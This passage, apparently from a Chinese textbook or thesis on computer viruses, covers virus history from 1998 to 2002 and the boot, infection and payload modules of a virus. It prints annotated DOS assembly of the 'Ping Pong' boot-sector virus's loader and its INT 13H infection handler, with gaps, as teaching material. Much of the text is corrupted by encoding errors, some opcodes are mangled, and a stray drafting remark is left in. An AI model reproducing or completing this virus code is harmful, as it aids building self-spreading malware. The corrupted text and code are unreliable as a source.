54、us”等, 第一個(gè)感染Java 可執(zhí)行文件的Strange Brew 病毒, 一種新的用實(shí)用VB 腳本語(yǔ)言編寫(xiě)的Robbit 病毒。后3 種類(lèi)型的病毒以及這3 種技術(shù)結(jié)合產(chǎn)生的病毒( 還有以后一些新的技術(shù)) 都是之后直到現(xiàn)在最流行的病毒。</p><p>　　1999 年, 通過(guò)郵件進(jìn)行病毒傳播開(kāi)始成為病毒傳播的主要途徑, 而宏病毒仍然是最流行的病毒。這一年, 比較有名的病毒有：Melissa , 一種宏病毒和蠕

55、蟲(chóng)的混合物, 通過(guò)電子郵件系統(tǒng)大量傳播, 造成網(wǎng)絡(luò)的阻塞、癱瘓;Happy99 ;FunLove 等等。</p><p>　　2000 年被稱(chēng)作VBScript 病毒/ 蠕蟲(chóng)之年。大量使用腳本技術(shù)的病毒出現(xiàn), 腳本病毒和蠕蟲(chóng)、傳統(tǒng)的病毒、木馬程序以及操作系統(tǒng)的安全漏洞相結(jié)合, 給病毒技術(shù)帶來(lái)了一個(gè)新的發(fā)展高峰。VBS/ KAK 蠕蟲(chóng)利用因特網(wǎng)瀏覽器和Outlook 中的漏洞( Scirptlet .Typelib

56、 和Eyedog) , 靠用戶用Outlook 打開(kāi)或預(yù)覽一個(gè)含有病毒性VBScript 的HTML 文件而使用戶的機(jī)器感染;Loveletter 病毒則是以給電子郵件的附件兩個(gè)擴(kuò)展名的詭計(jì)( Love- Letter-for you .txt .vbs) 來(lái)得到比Melissa 病毒更快更遠(yuǎn)的傳播。</p><p>　　2000 年, 中國(guó)的金山公司發(fā)布金山毒霸, 金山公司開(kāi)始進(jìn)入殺毒軟件市場(chǎng)。</p&g

57、t;<p>　　2001 年可謂是計(jì)算機(jī)安全領(lǐng)域的多事之秋。7 月出現(xiàn)的Code Red 和Code Red II ,特別是9 月出現(xiàn)的Ni mda 病毒( 以36 .07 % 高居本年度病毒感染率第一) , 更是突破了以往病毒的各種傳播途徑, 它們會(huì)利用微軟服務(wù)器漏洞植入后門(mén)程序的特洛伊木馬, 或是通E- mail 大肆傳播、衍生無(wú)數(shù)變種的計(jì)算機(jī)蠕蟲(chóng), 也有可能是通過(guò)瀏覽網(wǎng)頁(yè)下載病毒, 甚至三者兼具, 造成了大范圍的因特

58、網(wǎng)上的服務(wù)器被阻斷或訪問(wèn)速度下降, 在世界范圍內(nèi)造成了巨大的損失。僅Code Red 病毒所造成的經(jīng)濟(jì)損失, 就遠(yuǎn)遠(yuǎn)超過(guò)過(guò)去6 年來(lái)任何一年的年度損失。根據(jù)趨勢(shì)科技TrendLabs 全球防病毒研發(fā)暨技術(shù)支持中心所做的2001 年十大病毒統(tǒng)計(jì), 蠕蟲(chóng)、特洛依木馬型病毒占絕大部分, 自1995 年起持續(xù)6 年為病毒主要形態(tài)的宏病毒已退居十大病毒之外, 而E- mail 仍為傳播病毒的熱門(mén)渠道。</p><p>　　

59、2001 年前病毒的形態(tài)非常單純, 依其感染的方式, 可分為感染開(kāi)機(jī)區(qū)的開(kāi)機(jī)型、感染執(zhí)行文件的文件型、感染W(wǎng)ord 文件的文件宏病毒型等等。而自從2002 年7 月,Code Red利用IIS 漏洞揭開(kāi)了黑客與病毒并肩作戰(zhàn)的反傳統(tǒng)的攻擊模式,Code Red 在病毒史上的地位, 就如同第一個(gè)病毒Brain 一樣, 具有難以抹滅的歷史意義。同時(shí)這種反傳統(tǒng)的攻擊模式, 使得傳統(tǒng)的防毒軟件面臨更高的挑戰(zhàn)。從首例計(jì)算機(jī)病毒被發(fā)現(xiàn)起, 病毒的發(fā)展

60、速度十分驚人( 雖然各種說(shuō)法不盡相同) 。按照較多的一種說(shuō)法,1988 年底, 病毒不足100 種;1987 年到1989 年間發(fā)現(xiàn)的計(jì)算機(jī)病毒有80 多種;1991 年, 全球病毒數(shù)量不到500 種;1994 年夏, 病毒的數(shù)量已近5000 種; 到1998 年夏, 全世界已發(fā)現(xiàn)的病毒超過(guò)15 000 種; 到2000 年底, 病毒的數(shù)量已超過(guò)55 000種; 到了2002 年, 病毒數(shù)量已增至60000 種。2000 年12 月在日

61、本東京舉行的“亞洲計(jì)算機(jī)反病毒大會(huì)”對(duì)2000 年11 月以前的病毒種類(lèi)和數(shù)量作出了初步的報(bào)告：</p><p>　　DOS 病毒： 40 000 種</p><p>　　Windows 32 病毒： 15 種</p><p>　　Windows 9x 病毒： 600 種</p><p>　　Windows NT/ Windows 2000

62、病毒： 200 種</p><p>　　Word 宏病毒： 7500 種</p><p>　　Excel 宏病毒： 1500 種</p><p>　　PowerPoint 病毒： 100 種</p><p>　　Script 腳本病毒： 500 種</p><p>　　Macintos 蘋(píng)果機(jī)病毒： 50 種</

63、p><p>　　Linux 病毒： 5 種</p><p><b>　　手機(jī)病毒： 2 種</b></p><p>　　合計(jì)： 55000 種</p><p>　　在病毒的發(fā)展史上, 病毒的出現(xiàn)是有規(guī)律的。一般情況下, 一種新的病毒技術(shù)出現(xiàn)后, 病毒迅速發(fā)展, 接著反病毒技術(shù)的發(fā)展會(huì)抑制其流傳; 操作系統(tǒng)進(jìn)行升級(jí)時(shí), 病毒也

64、會(huì)調(diào)整為新的方式, 產(chǎn)生新的病毒技術(shù)。</p><p>　　計(jì)算機(jī)病毒的結(jié)構(gòu)和作用機(jī)制</p><p>　　3.1 計(jì)算機(jī)病毒的結(jié)構(gòu)組成</p><p>　　計(jì)算機(jī)病毒是一段特殊程序，它的其最大特點(diǎn)是具有感染能力和表現(xiàn)( 破壞) 能力。計(jì)算機(jī)病毒在程序結(jié)構(gòu)、磁盤(pán)上的存儲(chǔ)方式、感染目標(biāo)的方式以及控制系統(tǒng)的方式上既具有許多共同的特點(diǎn)，同時(shí)又有許多特殊的技巧和方法，了解病

65、毒程序的這些結(jié)構(gòu)和特征對(duì)于有效地預(yù)防、檢測(cè)和清除病毒是非常有必要的。</p><p>　　計(jì)算機(jī)病毒與生物病毒一樣，有其自身的病毒體( 病毒程序) 和寄生體。寄生體為病毒提供一種生存環(huán)境，當(dāng)病毒程序寄生于合法程序的時(shí)候，病毒就成為了程序的一部分，并在程序中占有合法的地位，這樣合法程序就成了病毒程序的寄生體，或稱(chēng)病毒程序的載體。病毒可寄生于合法程序的任何位置。</p><p>　　計(jì)算機(jī)病毒

66、之所以具有寄生能力和破壞能力，和病毒程序的結(jié)構(gòu)有關(guān)。從目前已出現(xiàn)的病毒來(lái)看，病毒都具有相同的邏輯程序結(jié)構(gòu)如圖3 .1 所示，一</p><p>　　般包含3 大模塊即：引導(dǎo)模塊、感染模塊和表現(xiàn)( 破壞) 模塊。其中后兩個(gè)模塊都包括一段觸發(fā)條件檢查程序段，它們分別檢查是否滿足觸發(fā)條件和是否滿足表現(xiàn)( 破壞) 的條件，一旦相應(yīng)的條件得到滿足，病毒就會(huì)進(jìn)行感染和表現(xiàn)( 破壞) 。</p><p>

67、;　　引導(dǎo)模塊的功能是將病毒程序引入內(nèi)存并使其后面的兩個(gè)模塊處于激活狀態(tài)，感染模塊的功能是，在感染條件滿足時(shí)把病毒感染到所攻擊的對(duì)象上；表現(xiàn)( 破壞) 模塊的功能是，在病毒發(fā)作條件( 表現(xiàn)、破壞條件) 滿足時(shí)，實(shí)施對(duì)系統(tǒng)的干擾和破壞活動(dòng)。</p><p>　　3.2 病毒的引導(dǎo)部分</p><p>　　3.2.1 病毒的引導(dǎo)模塊和引導(dǎo)機(jī)制</p><p>　　引導(dǎo)模

68、塊的主要作用是將靜態(tài)病毒激活，使之成為動(dòng)態(tài)病毒。動(dòng)態(tài)病毒是指要么已進(jìn)入內(nèi)存處于活動(dòng)狀態(tài)的病毒，要么能通過(guò)調(diào)用某些中斷而獲得運(yùn)行權(quán)，從而它就可以隨心所欲。</p><p>　　病毒程序的加載分為兩個(gè)步驟：一是系統(tǒng)加載過(guò)程;二是病毒附加的加載過(guò)程。系統(tǒng)加載過(guò)程通常讀入病毒程序的引導(dǎo)部分,并將系統(tǒng)控制權(quán)轉(zhuǎn)交病毒引導(dǎo)程序。病毒引導(dǎo)程序一般都是病毒附加的加載過(guò)程,它主要用來(lái)完成對(duì)病毒程序的完整讀入和安裝。病毒程序選擇的加載

69、點(diǎn)、目標(biāo)多是計(jì)算機(jī)的固有弱點(diǎn)或軟件系統(tǒng)的輸入節(jié)點(diǎn)。</p><p>　　具體的說(shuō)，病毒的加載過(guò)程，主要有3個(gè)步驟組成：</p><p><b>　　開(kāi)辟內(nèi)存空間</b></p><p>　　病毒要起作用，就必須駐留內(nèi)存，要想駐留就必須開(kāi)辟內(nèi)存空間或直接覆蓋系統(tǒng)占用的部分內(nèi)存。</p><p><b>　　病毒體

70、定位和駐留</b></p><p>　　病毒進(jìn)入內(nèi)存后即脫離原載體程序，在內(nèi)存駐留區(qū)域進(jìn)行重定位，而且對(duì)內(nèi)存中的病毒程序采取一定的保護(hù)措施，使之不會(huì)被正常程序覆蓋掉。病毒駐留內(nèi)存后，要對(duì)內(nèi)存中的病毒程序設(shè)定某種激活方式，使之在適當(dāng)?shù)臅r(shí)候能取得運(yùn)行權(quán)，這就必須使病毒的有關(guān)組成單元取代或擴(kuò)充系統(tǒng)的原有功能，包括改寫(xiě)中斷向量，設(shè)置激活、感染、表現(xiàn)( 破壞) 條件，初始化內(nèi)部各數(shù)據(jù)單元等。在取得控制權(quán)后，病毒

71、依據(jù)自身?xiàng)l件的制約，在適當(dāng)?shù)臈l件下進(jìn)行感染和破壞。</p><p><b>　　3.3恢復(fù)系統(tǒng)功能</b></p><p>　　為保證病毒駐入的系統(tǒng)能繼續(xù)有效工作，提高隱蔽性，大多數(shù)病毒程序?qū)⒉《酒茐牡挠嘘P(guān)信息轉(zhuǎn)儲(chǔ)于其他特定單元，允許系統(tǒng)通過(guò)病毒程序使用。</p><p>　　3.3.1 病毒引導(dǎo)部分舉例</p><p>

72、;　　例：“小球”病毒的引導(dǎo)部分的程序片段</p><p>　　病毒的引導(dǎo)程序主要進(jìn)行以下操作：</p><p>　　修改內(nèi)存可用空間的大小，病毒首先在內(nèi)存的最高端預(yù)留出2 kB 存儲(chǔ)空間；</p><p>　　將病毒的引導(dǎo)程序模塊及有關(guān)參數(shù)從0000∶7C00H 處移到該區(qū)域中，然后把控制轉(zhuǎn)向該區(qū)域的病毒程序處開(kāi)始執(zhí)行；</p><p>　

73、　在標(biāo)為“壞”磁盤(pán)扇區(qū)中裝有病毒程序的另一部分，將其裝入并連接到病毒引導(dǎo)模塊之后；</p><p>　　將原DOS 的正常引導(dǎo)程序讀入內(nèi)存中病毒程序引導(dǎo)模塊騰出來(lái)的0000∶7C00H處；</p><p>　　初始化參數(shù)，修改INT 13H 中斷向量，使它指向病毒的感染模塊的入口；</p><p>　　將控制權(quán)還給DOS 引導(dǎo)程序，開(kāi)始執(zhí)行真正的系統(tǒng)的引導(dǎo)。<

74、/p><p>　　下面代碼少寫(xiě)或者不寫(xiě)。</p><p>　　0000∶7C00 EB1C JMP 7C1E</p><p>　　. . . . . . . . .</p><p>　　0000∶7C1E 33C0 XOR AX ，AX</p><p>　　0000∶7C20 8ED0 MOV SS，AX</p>

75、;<p>　　0000∶7C22 BC007C MOV SP，7C00</p><p>　　0000∶7C25 8ED8 MOV DS，AX</p><p>　　0000∶7C27 A11304 MOV AX，[ 0413]；[ 0413] = 內(nèi)存空間大小</p><p>　　0000∶7C2A 2D0200 SUB AX，0001；內(nèi)存總量減去2

76、kB，以防</p><p>　　0000∶7C2D A31304 MOV [ 0413]，AX；用戶程序覆蓋</p><p>　　0000∶7C30 B106 MOV CL，06；計(jì)算最高段地址</p><p>　　0000∶7C32 D3E0 SHL AX，CL</p><p>　　0000∶7C34 2DC007 SUB AX，07C0；

77、如內(nèi)存為640K，AX= 07C0</p><p>　　把病毒程序的第一部分從0000∶7C00H～0000∶7DFFH 搬到內(nèi)存高端留出的2 kB 空間中，位置為97C0∶7C00H～97C0∶7DFFH。</p><p>　　0000∶7C37 8EC0 MOV ES，AX</p><p>　　0000∶7C39 BE007C MOV SI，7C00</p

78、><p>　　0000∶7C3C 8BFE MOV DI，SI</p><p>　　0000∶7C3E B90001 MOV CX，0100</p><p>　　0000∶7C41 F3 REPZ；將[ 0000∶7C00H] →[ ES∶7C00]</p><p>　　0000∶7C42 A5 MOVSW；傳送256 個(gè)字</p>

79、<p>　　0000∶7C43 8EC8 MOV CS，AX；CS= 病毒程序段地址</p><p>　　97C0∶7C45 0E PUSH CS</p><p>　　97C0∶7C46 1F POP DS</p><p>　　97C0∶7C47 E80000 CALL 7C4A</p><p>　　97C0∶7C4A 32E4

80、XOR AH，AH</p><p>　　97C0∶7C4C CD13 I NT 13；復(fù)位磁盤(pán)</p><p>　　97C0∶7C4E 8026F87D80 AND BYTE PTR[ 7DF8]，80</p><p>　　97C0∶7C53 8B1EF97D MOV BX，[ 7DF9]；[ 7DF9] = 病毒第二部分的開(kāi)始</p><p&g

81、t;　　97C0∶7C57 0E PUSH CS；邏輯扇區(qū)號(hào)</p><p>　　97C0∶7C58 58 POP AX</p><p>　　97C0∶7C59 2D2000 SUB AX，0200</p><p>　　97C0∶7C5C 8EC0 MOV ES，AX</p><p>　　97C0∶7C5E E83C00 CALL 7C9D；

82、讀病毒第二部分程序</p><p>　　97C0∶7C61 8B1EF97D MOV BX，[ 7DF9]</p><p>　　97C0∶7C65 43 I NC BX；BX= 原引導(dǎo)記錄所在邏輯扇區(qū)號(hào)</p><p>　　97C0∶7C66 B8C0FF MOV AX，F(xiàn)FC0；FFC0 + 8000 =7C00( 不計(jì)溢出)</p><p&g

83、t;　　97C0∶7C69 8EC0 MOV ES，AX</p><p>　　97C0∶7C6B E82F00 CALL 7C9D；讀原引導(dǎo)記錄到0000∶7C00H 中</p><p>　　97C0∶7C6E 33C0 XOR AX，AX</p><p>　　97C0∶7C70 A2F77D MOV [ 7DF7]，AL</p><p>　

84、　97C0∶7C73 8ED8 MOV DS，AX</p><p>　　97C0∶7C75 A14C00 MOV AX，[ 004C]</p><p>　　97C0∶7C78 8B1E4E00 MOV BX，[ 004E]；取I NT 13H 中斷向量→BX，AX</p><p>　　97C0∶7C7C C7064C00D0 MOV WORD PTR[ 4C]，7C

85、D0</p><p>　　97C0∶7C82 8C0E4E00 MOV [ 004E]，CS；改INT 13H 中斷向量為：CS∶7CD0</p><p>　　97C0∶7C86 0E PUSH CS；保留原INT 13H 中斷向量</p><p>　　97C0∶7C87 1F POP DS</p><p>　　97C0∶7C88 A32A7

86、D MOV [ 7D2A]，AX；原向量移→[ DS∶7D2A]</p><p>　　97C0∶7C8B 891E2C7D MOV [ 7D2C]，BX；段地址→[ DS∶7D2C]</p><p>　　97C0∶7C8F 8A16F87D MOV DL，[ 7DF8]</p><p>　　97C0∶7C93 EA007C0000 JMP 0000∶7C00；把控制

87、權(quán)交給原DOS 引導(dǎo)程序</p><p>　　97C0∶7C98 B80103 MOV AX，0301；寫(xiě)盤(pán)模塊</p><p>　　97C0∶7C9B EB03 JMP 7CA0；</p><p>　　97C0∶7C9D B80102 MOV AX，0201；讀盤(pán)模塊</p><p>　　97C0∶7CA0 93 XCHG BX，AX<

88、;/p><p>　　97C0∶7CA1 03061C7C ADD AX ，[ 7C1C] ；[ 7C1C] = 隱藏扇區(qū)數(shù)</p><p>　　97C0∶7CA5 33D2 XOR DX，DX</p><p>　　97C0∶7CA7 F736187C DI V WORD PTR [ 7C18] ；[ 7C18] = 每道扇區(qū)數(shù)</p><p>　

89、　97C0∶7CAB FEC2 I NC DL</p><p>　　97C0∶7CAD 8AEA MOV CH，DL</p><p>　　97C0∶7CAF 33D2 XOR DX，DX</p><p>　　97C0∶7CB1 F7361A7C DI V WORD PTR[ 7C1A] ；[ 7C1A] = 磁頭數(shù)</p><p>　　97C

90、0∶7CB5 B106 MOV CL ，06</p><p>　　97C0∶7CB7 D2E4 SHL AH，CL</p><p>　　97C0∶7CB9 0AE5 OR AH，CH</p><p>　　97C0∶7CBB 8BC8 MOV CX ,AX</p><p>　　97C0∶7CBD 86E9 XCHG CL，CH</p>

91、;<p>　　97C0∶7CBF 8AF2 MOV DH，DL</p><p>　　97C0∶7CC1 8BC3 MOV AX，BX</p><p>　　97C0∶7CC3 8A16F87D MOV DL，[ 7DF8]；讀寫(xiě)磁盤(pán)的子程序</p><p>　　97C0∶7CC7 BB0080 MOV BX，8000</p><p&g

92、t;　　97C0∶7CCA CD13 I NT 13</p><p>　　97C0∶7CCC 7301 JNB 7CCF</p><p>　　97C0∶7CCE 58 POP AX</p><p>　　97C0∶7CCF C3 RET</p><p>　　. . . . . . . . .</p><p>　　3.4

93、病毒的感染部分</p><p>　　3.4.1 病毒的感染模塊及感染機(jī)制</p><p>　　感染模塊主要完成病毒的動(dòng)態(tài)感染，是各種病毒必不可少的模塊。各種病毒感染模塊大同小異，區(qū)別主要在于感染條件。病毒在取得對(duì)系統(tǒng)的控制權(quán)后，先執(zhí)行它的感染操作中的條件判斷模塊，判斷感染條件是否滿足(如每次打開(kāi)新的文件、程序或?qū)Υ疟P(pán)進(jìn)行操作時(shí)，病毒就會(huì)檢查是否為特定的文件、程序，或?qū)ふ椅募?、程序或磁盤(pán)等介

94、質(zhì)中是否有感染標(biāo)記，是否為特定系統(tǒng)的時(shí)間、日期等) ；如果滿足感染條件，進(jìn)行感染，將病毒代碼入宿主程序；然后再執(zhí)行其他的操作( 如執(zhí)行病毒的表現(xiàn)( 破壞) 模塊) ，最后再執(zhí)行系統(tǒng)正確的處理，這是病毒感染經(jīng)常采取的手段之一。</p><p>　　3.4.2 感染部分程序的舉例</p><p>　　例：“小球”病毒的感染部分的片段</p><p>　　在系統(tǒng)啟動(dòng)過(guò)程中

95、，病毒程序的引導(dǎo)模塊完成了整個(gè)病毒程序的加載，并使得病毒程序的感染模塊處于激活狀態(tài)，在系統(tǒng)運(yùn)行過(guò)程中，一旦發(fā)生了I NT 13H 中斷，病毒程序的感染模塊即被執(zhí)行，其執(zhí)行流程如圖3 .2 所示。</p><p>　　下面是“小球”病毒感染模塊和表現(xiàn)模塊的判斷程序部分，由INT 13H 指向。</p><p>　　代碼少寫(xiě)，或者不寫(xiě)，只要說(shuō)明原理就行了，如果你完全明白他的意思也可以寫(xiě)。代碼的

96、字體比正文小一號(hào)。。。。。</p><p>　　97C0∶7CD0 1E PUSH DS ；7CD0 ～7CD9H 為修改后的</p><p>　　97C0∶7CD1 06 PUSH ES ；I NT 13H 中斷服務(wù)程序</p><p>　　97C0∶7CD2 50 PUSH AX</p><p>　　97C0∶7CD3 53 PUSH B

97、X</p><p>　　97C0∶7CD4 51 PUSH CX</p><p>　　97C0∶7CD5 52 PUSH DX</p><p>　　97C0∶7CD6 0E PUSH CS</p><p>　　97C0∶7CD7 1F POP DS</p><p>　　97C0∶7CD8 0E PUSH CS</

98、p><p>　　97C0∶7CD9 07 POP ES</p><p>　　97C0∶7CDA F606F77D01 TEST BYTE PTR [7DF7] ，01；是否感染狀態(tài)</p><p>　　97C0∶7CDF 7542 JNZ 7D23</p><p>　　97C0∶7CE1 80FC02 CMP AH，02；是否讀盤(pán)操作</p

99、><p>　　97C0∶7CE4 753D JMZ 7D23</p><p>　　97C0∶7CE6 3816F87D CMP [ 7DF8] ，DL ；驅(qū)動(dòng)器號(hào)是否一致</p><p>　　97C0∶7CEA 8816F87D MOV [ 7DF8] ，DL</p><p>　　97C0∶7CEE 7522 JNZ 7D12 ；不是則轉(zhuǎn)7D12

100、H</p><p>　　97C0∶7CF0 32E4 XOR AH，AH</p><p>　　97C0∶7CF2 CD1A I NT 1A ；讀時(shí)鐘計(jì)數(shù)值</p><p>　　97C0∶7CF4 F6C67F TEST DH，7F</p><p>　　97C0∶7CF7 750A JNZ 7D03</p><p>　　

101、97C0∶7CF9 F6C2F0 TEST DL ，F(xiàn)0 ；7CE1 ～7CFEH 為表現(xiàn)模塊的判斷</p><p>　　97C0∶7CFC 7 505 JNZ 7D03 ；部分是否連續(xù)兩次讀同一盤(pán)且滿足</p><p>　　97C0∶7CFE 52 PUSH DX ；整點(diǎn)或半點(diǎn)的時(shí)間條件</p><p>　　97C0∶7CFF E8B101 CALL 7EB3 ；

102、滿足條件，執(zhí)行表現(xiàn)模塊</p><p>　　97C0∶7D02 5A POP DX</p><p>　　97C0∶7D03 8BCA MOV CX，DX</p><p>　　97C0∶7D05 2B16B07E SUB DX，[ 7EB0]</p><p>　　97C0∶7D09 890EB07E MOV [ 7EB0] ，CX</p&

103、gt;<p>　　97C0∶7D0D 83EA24 SUB DX,，+ 24</p><p>　　97C0∶7D10 7211 JB 7D23</p><p>　　97C0∶7D12 800EF77D01 OR BYTE PTR [ 7DF7] ，01 ；感染狀態(tài)標(biāo)志</p><p>　　97C0∶7D17 56 PUSH SI</p>

104、<p>　　97C0∶7D18 57 PUSH DI</p><p>　　97C0∶7D19 E81200 CALL 7D2E ；執(zhí)行感染模塊</p><p>　　97C0∶7D1C 5F POP DI</p><p>　　97C0∶7D1D 5E POP SI</p><p>　　97C0∶7D1E 8026F77DFE AND

105、BYTE PTR [ 7DF7] ，F(xiàn)E ；清感染狀態(tài)</p><p>　　97C0∶7D23 5A POP DX</p><p>　　97C0∶7D24 59 POP CX</p><p>　　97C0∶7D25 5B POP BX</p><p>　　97C0∶7D26 58 POP AX</p><p>　　97

106、C0∶7D27 07 POP ES</p><p>　　97C0∶7D28 1F POP DS</p><p>　　97C0∶7D29 EA1A0500C8 JMP C800∶051A ；執(zhí)行原INT 13H</p><p>　　大致過(guò)程是：讀入目標(biāo)磁盤(pán)的第一扇區(qū)，并判斷是何種類(lèi)型磁盤(pán)、是否已被小球病毒感染( 病毒標(biāo)志為1357H)，符合條件時(shí)進(jìn)行感染。首先在FAT

107、 表中找出一個(gè)未用簇，并將它標(biāo)為壞簇，然后將病毒程序的第二部分寫(xiě)入該簇第一扇區(qū)，把原磁盤(pán)的引導(dǎo)記錄寫(xiě)入第二扇區(qū)，并把病毒程序的第一部分寫(xiě)入被感染目標(biāo)盤(pán)的引導(dǎo)扇區(qū)，這就完成了“小球”病毒對(duì)一個(gè)新磁盤(pán)的感染。</p><p>　　3.5 病毒的表現(xiàn)（破壞）部分</p><p>　　3.5.1 病毒的表現(xiàn)（破壞）模塊及表現(xiàn)（破壞）機(jī)制</p><p>　　表現(xiàn)( 破壞)

108、模塊主要完成病毒的表現(xiàn)或破壞功能，也可稱(chēng)為病毒的載體模塊，是計(jì)算機(jī)病毒的主體模塊。它負(fù)責(zé)實(shí)施病毒的表現(xiàn)( 破壞) 動(dòng)作，其內(nèi)部是實(shí)現(xiàn)病毒編寫(xiě)者預(yù)定計(jì)算機(jī)病毒的結(jié)構(gòu)及作用機(jī)制破壞動(dòng)作的代碼，這些破壞動(dòng)作可能是破壞文件、數(shù)據(jù)，或計(jì)算機(jī)的空間效率和時(shí)間效率,使系統(tǒng)的運(yùn)行變慢，干擾視頻顯示，甚至使機(jī)器運(yùn)行崩潰，這是病毒為了表明自己的存在和達(dá)到自己的目的，或早或晚是一定要發(fā)作的。</p><p>　　它的發(fā)作部分應(yīng)具備兩個(gè)

109、特征：第一，程序要有一定的隱蔽性及潛伏性，因?yàn)椴《镜倪@部分程序是非正常的處理程序，不愿意被人們發(fā)現(xiàn)它的存在；第二，病毒發(fā)作的條件性和多樣性。無(wú)論哪一種計(jì)算機(jī)病毒，都很少在未進(jìn)行條件判斷之前隨意發(fā)作，通常只有在符合某種條件以后才發(fā)作。</p><p>　　病毒的觸發(fā)條件大概有以下5 種： 時(shí)間、日期作觸發(fā)條件；② 計(jì)數(shù)器作觸發(fā)條件；③ 鍵盤(pán)字符輸入作觸發(fā)條件；④ 特定文件出現(xiàn)作觸發(fā)條件；⑤ 綜合觸發(fā)條件，它決定于病

110、毒設(shè)計(jì)者的意圖。</p><p>　　計(jì)算機(jī)病毒的破壞和表現(xiàn)模塊一般分為兩個(gè)部分：一個(gè)是破壞模塊的觸發(fā)條件的判斷部分；一個(gè)是破壞功能的實(shí)施部分。觸發(fā)條件的判斷部分時(shí)刻監(jiān)視著計(jì)算機(jī)系統(tǒng)的運(yùn)行環(huán)境，尋找破壞和表現(xiàn)的時(shí)刻；而破壞功能的實(shí)施部分經(jīng)常靜止不動(dòng)，有的病毒甚至要潛伏一年半載，甚至三五年，視觸發(fā)條件的設(shè)計(jì)而定，一旦條件滿足，實(shí)施破壞部分被觸發(fā)，才突然發(fā)作。許多潛伏期長(zhǎng)的惡性病毒發(fā)作的破壞作用是難以預(yù)計(jì)的。<

111、/p><p>　　和病毒的感染模塊一樣，破壞模塊可能在病毒程序第一次加載時(shí)就運(yùn)行，也可能在第一次加載時(shí)只將引導(dǎo)模塊引入內(nèi)存，以后再通過(guò)某些中斷機(jī)制觸發(fā)才運(yùn)行。破壞機(jī)制在設(shè)計(jì)原則上也與感染機(jī)制基本相同，也是通過(guò)修改某一中斷向量入口地址，使該中斷向量指向病毒程序的破壞模塊。因?yàn)椴《颈憩F(xiàn)( 破壞) 模塊的觸發(fā)大都與系統(tǒng)時(shí)間有關(guān)，所以病毒常用到的系統(tǒng)中斷，除了病毒傳播利用的INT 13H、INT 21H 外，還有與系統(tǒng)時(shí)間或